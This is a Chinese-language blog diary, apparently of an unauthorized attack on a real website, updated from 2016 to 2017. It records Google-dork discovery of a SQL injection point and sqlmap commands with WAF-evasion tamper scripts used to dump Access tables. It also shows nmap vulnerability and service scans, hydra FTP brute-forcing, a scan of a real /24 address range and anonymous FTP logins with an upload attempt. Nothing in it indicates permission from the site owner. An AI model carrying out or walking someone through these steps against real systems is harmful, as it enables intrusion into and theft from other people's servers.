Access数据库实践

2016.1209Access数据库实践

2016.1209Access数据库实践

用google语法,找到一个注入点。用sqlmap检测一下。

sqlmap显示,在access数据库中,列举数据库名称是不可能的,让我们直接列举表名。

真的等了有蛮久。。是穷举吗,最后得出了数据库名称,和表名。


接下来列名。



以及列名中的数据。



没找到后台。


2017.10.22 更新

进行信息收集。在网页后方加 /foot.asp   了解该网页制作时间是七八年前。

/uploadfile   403禁止访问,看来基本的安全措施是做了的

Directory Listing Denied

This Virtual Directory does not allow contents to be listed.

操作系统:Microsoft Windows 2003|XP (92%)

开放端口:21(ftp)、80(http)

开放具体服务版本:

nmap 域名 -sV -p 21,80

21/tcp open  ftp    Microsoft ftpd

80/tcp open  http    Microsoft IIS httpd 6.0

nmap --script=vuln www.域名马赛克.org

http-csrf:

| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=域名马赛克

|  Found the following possible CSRF vulnerabilities:

|    Path: http://www.域名马赛克/ly.asp

|    Form id:

|_    Form action: messageok.asp?actopt=add

|_http-dombased-xss: Couldn't find any DOM based XSS.

whatweb -v 域名

没有探测到什么特别的信息,结果基本符合上面探测的内容。


sqlmap -u "http://www.xxx.org/yyjshow.asp?id=1429&ctype=ÒôÀÖ¼¾" --dbms "Microsoft Access" --level 3

再次注入,发现该网站加了一个waf。。。虽然可以用sqlmap绕过,但是请求过多就会拒绝连接。于是。。。

sqlmap -u "http://www.xxxxx.org/yyjshow.asp?id=1429&ctype=ÒôÀÖ¼¾" --dbms "Microsoft Access" --level 3 --tamper charunicodeencode.py space2comment.py --tables

[22:14:40] [ERROR] cannot retrieve table names, back-end DBMS is Access

do you want to use common table existence check? [Y/n/q] y

这种枚举方式有3000多个表,而且连接经常断掉,所以暂时放弃。

获得一个存在的表 user

ftp爆破:hydra ip ftp -L 用户名.txt -P 密码.txt -t 线程(默认16) -vV

检查C段

nmap -sV 61.155.154.* -oX myscan.xml

全部是在线的,而且都是windows,开端口21、80.

ftp匿名登录扫描,扫到了2个。。真是好运气

xx.xx.xx.xx:     21 - Anonymous READ (220-Microsoft FTP Service 220)

ftp  xxx.xxx.xx.xx

anonymous

ls

put /root/Desktop/xx.py

两个ftp服务器上,没发现任何文件,而且没有写权限。

啊啊~溢出溢出不会。

待续